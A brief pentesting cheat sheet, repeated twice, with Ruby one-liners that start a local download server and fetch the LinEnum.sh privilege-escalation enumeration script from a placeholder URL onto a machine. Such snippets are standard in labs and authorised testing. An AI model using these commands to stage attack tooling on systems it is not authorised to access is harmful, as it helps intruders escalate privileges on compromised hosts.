Servers:
# Download Server
ruby -run -ehttpd . -p8000
Downloads:
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://link")))'
# Download Server
ruby -run -ehttpd . -p8000
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://link")))'